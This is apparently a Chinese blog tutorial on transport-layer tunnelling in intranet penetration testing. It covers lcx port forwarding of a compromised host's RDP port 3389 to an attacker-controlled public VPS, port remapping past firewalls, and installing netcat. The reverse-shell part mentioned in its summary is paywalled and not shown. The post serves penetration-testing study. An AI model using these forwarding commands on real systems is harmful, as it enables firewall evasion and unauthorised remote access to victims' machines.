【内网渗透】——隐藏通信隧道技术之传输层隧道技术

最新推荐文章于 2023-08-22 11:00:00 发布
原创 最新推荐文章于 2023-08-22 11:00:00 发布 · 1.4k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全 #信息安全 #渗透测试 #内网渗透

本文介绍传输层隧道技术,包括LCX端口转发、内网端口转发、本地端口映射以及Netcat(NC)的使用。探讨如何在目标主机中没有NC的情况下获取反向Shell,涉及Python和Bash反弹技巧。

文章目录

传输层隧道技术

传输层包括TCP隧道,UDP隧道和常规端口转发,内网防火墙阻止了对指定端口的访问,获取目标机器的权限后可以使用IPTABLES打开指定端口

1. lcx端口转发

经典端口转发工具:lcx
windows版为lcx.exe , linux版为portmap
正常的socket隧道必须具备两端:
一端为服务端,监听一个端口,等待客户端的连接
一端为客户端,通过传入服务器的IP地址和端口,才能主动与服务器连接

1.1 内网端口转发

在目标机器上执行如下命令将目标机器3389端口的所有数据转发到公网VPS的4444端口上

lcx.exe -slave <公网主机ip> 4444 127.0.0.1 3389

在VPS上执行如下命令,将本机4444端口上监听的所有数据转发到本机的5555端口上

lcx.exe -listen 4444 5555

用mstsc登陆 “<公网主机IP地址>:5555”,或者在VPS上用mstsc登陆主机127.0.0.1的5555端口,即可访问目标服务器的3389端口

1.2本地端口映射

如果目标服务器由于防火墙的配置,部分端口(列如:3389)的数据无法通过防火墙可以将目标服务器相应端口的数据的数据传到防火墙允许的其他端口(列如:53)。在目标主机上执行如下命令,可以直接从远程桌面连接目标主机的53端口

lxc -tran 53 <目标主机IP地址>

2. netcat(nc)

2.1 安装

(1)在kali中可以使用 nc -help或者 man nc 命令查看是否已经安装了nc
执行如下命令安装

sudo yum insatll nc.x86_64

(2)在windows中需要使用windows版本的nc
下载连接:
链接:https://pan.baidu.com/s/1SfN7Qm81fp3D9OkFRMArPg
提取码:3ds1

2.2 简单使用

(1)命令查询
nc的功能很多,可以输入 nc -h 命令进行查询

最低0.47元/天 解锁文章
隐藏通信隧道技术
qq_44657899的博客
07-01 733
文章目录0x00 隐藏通信隧道技术基础知识隐藏通信隧道概述判断内网连通性 0x00 隐藏通信隧道技术基础知识 隐藏通信隧道概述 常用的隧道列举如如下: 网络层:IPV6隧道、ICMP隧道、GRE隧道 传输层:TCP隧道、UDP隧道、常规端口转发 应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道 判断内网连通性 ICMP协议 ping www.baidu.com TCP协议 nc -zv 192.168.43.1 80 HTTP协议 curl ip地址:端口 DNS协议 nslookup
隐藏隧道通信技术
weixin_45644323的博客
10-09 1297
隐藏隧道基础知识 概述 网络通信前会在,两台机器建立TCP连接,然后进行通信。 隧道是绕过端口屏蔽的通信方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者进行封装 ,然后穿过防火墙,与对方通信。 隧道列举: 网络层:IPV6隧道,ICMP隧道,GRE隧道; 传输层:TCP隧道,UDP隧道,常规端口转发。 应用层:SSH隧道,HTTP隧道,HTTS隧道,DNS 隧道 判断内网连通性: 判断协议:tcp,http,dns,icmp等; 允许流量出口的端口:80 ,8080,443,53,110,123等
横向移动:隐藏通信隧道技术_传输层.(遨游于 内网任何主机)
网络安全领域___专研者.
04-30 3346
隧道技术的概括: 隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上。
内网渗透学习02——隐藏通信隧道技术
box
02-11 3736
隐藏通信隧道技术 0x00 隐藏通信隧道基础知识 1. 隐藏隧道通信概述 隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上。常见的隧道列举如下: 网络层:IPv6隧道、ICMP隧道、GRE隧道 传输层:TCP隧道、UDP隧道、常规端口转发 应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道 2. 判断网络连通性 判断内网联通性
内网渗透隐藏隧道技术
Zlirving_的博客
05-07 2074
  个人学习笔记及归纳总结,学习内网渗透的必备基础(干货)   隐藏隧道技术即是,绕过端口屏蔽的通信方式 判断内网连通性 imcp ping [ip] tcp nc -zv [ip] [port] http curl 支持文件上传和下载等。linux自带,windows须安装 curl [域名:端口] 设代理 curl -x [proxy-ip:port] [域名] dn...
内网渗透之隧道传输技术
hackzkaq的博客
11-10 5098
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一、内网-隧道传输 网络隧道技术指的是利用一种网络协议来传输另一种网络协议,它主要利用网络隧道协议来实现这种功能。网络隧道技术涉及了三种网络协议,即网络隧道协议、隧道协议下面的承载协议和隧道协议所承载的被承载协议。 在安全人员人员的日常工作中,会遇到因为相关配置或设备导致的无法和目标设备通信的状况,这时就可以尝试使用隧道通信解决。 防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达
内网渗透-必须掌握的代理与隧道技术解答
告白的博客
10-09 5386
0x00 内网渗透为什么使用代理与隧道技术 简单的来讲,当拿到某网络主机的权限,发现无法将流量或者权限发送出来,对渗透造成了很大的影响,所以内网渗透必须需要了解到两个技术知识,代理与隧道技术。 1)代理解决的问题:代理简单来讲解决网络之间的通信问题,如内网与外网之间或者两者自己之间的通信,两个不同内网通信就必须借助到代理,否则无法通讯。 2)隧道技术:简单来讲就是解决流量无法发送,隧道技术多用来绕过一些安全设备的监控,如防火墙,流量监控设备对我们发送的流量进行了拦截,这个时候需要接触隧道技术绕过拦截,隧道
内网渗透】搭建隧道
ssrf
06-05 3045
目录0x001 隧道介绍0x002 网络传输应用层检测连通性0x003 网络层ICMP隧道ptunnel使用 0x001 隧道介绍 什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
【基础知识】隐藏通信隧道技术
苏柳欣的博客
04-19 6264
基础知识什么是通信隧道什么是边缘设备(edge device)各层常用隧道举例 什么是通信隧道 在这里研究的隧道,具体就是一种绕过端口屏蔽的方式。举个🌰 ,比如在一个防火墙两端进行数据通信,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,进而通过防火墙,在防火墙两端进行通信,防火墙两端开辟的路径就相当于是一个隧道。另外,数据包经过防火墙会被封装,出去之后会解封。 什么是边缘设备(edge device) 参考链接:https://zh.wikipedia.org/wiki/边缘https
内网渗透隐藏通信隧道
focus on security
06-22 2747
前言 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 一、隐藏通信隧道基础知识 隧道 隧道技术是一种通过使用互联网络的基本设施在网络之间传递数据的方式,使用隧道传递的数据(或负载)可以是不同
传输层LCX隧道
战神/calmness的博客
11-19 406
https://github.com/inquisb/icmpsh 准备: kali 192.168.243.141 win7 192.168.243.154 icmp隧道搭建
内网渗透基石篇-- 隐藏通信隧道技术(上)
m0_59598029的博客
08-22 323
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。内网隧道基础上就到这里了,在本文中简单做了几个实验,都很基础,用来理解基础知识刚刚好。
内网渗透隐藏通信隧道技术
世间繁华梦一出
05-23 882
隐藏通信隧道技术一、隐藏通信隧道技术基础知识 完成内网信息收集后,渗透测试人员需要判断流量是否进得去、出得来。 隐藏通信隧道技术通常用于在访问受限的网络环境中追踪数据流向和在非信任的网站中实现安全数据传输。 一、隐藏通信隧道技术基础知识 1.1隐藏通信隧道概述 什么是隧道? ...
内网渗透测试隐藏通讯隧道技术(下)
whatday的专栏
07-30 1504
什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 上一节中,我们讲解了网络层的隧道技术(IPv6 隧道、ICMP 隧道)和传输层隧道技术(TCP 隧道、UDP 隧道、常规端口转
2020内网安全攻防:隐蔽通信隧道与防御策略
本资源是一份关于内网安全攻防的知识分享,主要关注于2020年1月12日的内网安全攻防学习指南,特别是第五章节——隐蔽通信隧道技术。这一章节详细介绍了隐密隧道通信的基本概念,包括隧道的定义——通过特定协议在...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值